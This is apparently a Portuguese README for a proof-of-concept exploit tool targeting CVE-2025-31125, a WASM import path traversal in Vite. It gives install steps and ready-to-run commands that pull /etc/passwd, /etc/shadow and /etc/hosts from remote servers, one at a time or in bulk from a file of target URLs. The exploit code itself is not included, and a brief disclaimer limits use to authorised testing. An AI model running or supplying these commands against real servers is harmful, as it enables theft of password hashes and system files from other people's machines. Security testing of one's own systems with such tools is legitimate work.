
Vite WASM Import Path Traversal 🛡️
Este script é um exploit prova de conceito (PoC) para CVE-2025-31125, uma vulnerabilidade encontrada no Vite. O exploit utiliza um problema de Path Traversal de Importação WASM para recuperar arquivos confidenciais de servidores vulneráveis que executam o framework Vite. Ele permite que atacantes acessem arquivos como /etc/passwd, /etc/shadow, /etc/hosts e outros arquivos confidenciais expostos pelo servidor. ⚠️
Esta ferramenta é apenas para fins educacionais e deve ser usada apenas em sistemas que você possui ou tem permissão explícita para testar. O acesso não autorizado a sistemas é ilegal e pode resultar em consequências legais. Use esta ferramenta com responsabilidade! ⚖️
/etc/passwd, /etc/shadow e mais! 💻requests 📦urllib3 🔒toilet (opcional, para banner) 🎨pip3 install -r requirements.txt
Para instalar o toilet (opcional para banner) no seu sistema:
sudo apt install toiletbrew install toiletgit clone https://github.com/0xgh057r3c0n/CVE-2025-31125.git
cd CVE-2025-31125
pip3 install -r requirements.txt
Para usar o script, forneça uma única URL alvo usando -u ou um arquivo com múltiplas URLs alvo usando -f.
-u, --url: Alvo de uma única URL. 🌐-f, --file: Forneça um arquivo com uma lista de URLs alvo (uma por linha). 📄--path: Especifique o caminho a ser explorado (ex.: /etc/passwd, /etc/shadow). O padrão é /etc/passwd. 🛠️--no-verify: Desabilite a verificação SSL (útil para certificados autoassinados). 🔒/etc/passwd)python3 exploit.py -u https://example.com --no-verify
/etc/shadow)python3 exploit.py -u https://example.com --no-verify --path /etc/shadow
/etc/passwd)python3 exploit.py -f targets.txt --no-verify
/etc/hosts)python3 exploit.py -f targets.txt --no-verify --path /etc/hosts
🙋♂️ Contato (Para Colaboração, Pesquisa e Discussões de Cibersegurança):
Este projeto está licenciado sob a Licença MIT. 🌟
